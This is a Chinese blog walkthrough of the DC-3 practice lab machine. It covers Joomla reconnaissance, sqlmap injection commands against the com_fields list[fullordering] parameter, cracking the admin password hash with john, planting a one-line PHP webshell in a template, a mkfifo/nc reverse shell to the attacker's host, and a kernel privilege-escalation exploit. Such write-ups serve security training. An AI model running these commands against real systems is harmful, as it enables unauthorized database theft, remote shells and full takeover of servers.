DC-3靶机练习

DC-3靶机练习

首先老样子,进行主机发现

nmap -sV -T4 192.168.47.0/24

DC-3靶机练习

发现192.168.47.138 开放80 http端口

访问网站主页

DC-3靶机练习

可以发现是以joomla框架搭建的网站,于是就可以去搜索与joomla相关的漏洞和资料

首先想到的是 msfconsole 中直接搜索Joomla并利用相关的payload,但是并没有任何效果。

与此同时 同时使用子域名挖掘工具dirb或者御剑之类的扫描网站

收集到了http://192.168.47.138/administrator/index.php

DC-3靶机练习

随后尝试使用searchsploit搜索相关payload

DC-3靶机练习

居然直接告诉我们使用sqlmap的payload了,必须尝试一下,毕竟也不浪费多少时间

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] –dbs

成功嗦到数据库昵称 joomladb 开始嗦表

sqlmap -u "http://192.168.47.138/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] -D "joomladb" –tables

DC-3靶机练习

sqlmap -u "http://192.168.47.138/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] -D "joomladb" –T “#__users”

DC-3靶机练习

在这里会告诉我们无法列举出表中的列名,以公共列列出吗? 我们选择y 继续跑

输入1或者直接回车

DC-3靶机练习

选择线程数 1 就可以

DC-3靶机练习

注意这里,检索出username和password字段即可按ctrl+c停止即可

DC-3靶机练习

最终的sqlmap payload如下,如果在中间列举不出表明也可以直接执行下面一段,效果一样但是步骤不全

sqlmap "http://192.168.47.138/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] -D "joomladb" -T "#__users" -C “username,password” –dump

DC-3靶机练习

最终跑出用户名 admin  

密码

$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

是一段加密 我们可以通过hash解密解出

将密码放在linux的一个文件中 使用john工具来解

得到账号 admin  密码 snoopy可以登陆后台了

寻找可以上传后门木马的地方,写入一句话木马,最终选择创建一个新的shell.php文件 并写入一句话,保存

通过Editing file “/shell.php” in template “beez3”.这句话得知

文件保存路径大概会是/template/beez3/shell.php,尝试蚁剑连接

DC-3靶机练习

Ok,连接成功,考虑webshell是一个非持续链接的后门,所以尝试使用蚁剑nc反弹

DC-3靶机练习
在蚁剑使用nc反弹

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.47.137 4444 >/tmp/f
nc -lvvp 4444

接下来是提权        使用searchsploit工具查找Ubuntu 16.04的提权漏洞

DC-3靶机练习

DC-3靶机练习

unzip 39772.zip                        解压提权exp
cd 39772                               进入目录
tar -xvf exploit.tar                   解压exp压缩包
cd ebpf_mapfd_doubleput_exploit        进入exp目录
./compile.sh                           执行提权文件
./doubleput

DC-3靶机练习

DC-3靶机练习

完结撒花

                       

点击阅读全文

上一篇 2023年 5月 25日 am10:34
下一篇 2023年 5月 25日 am10:35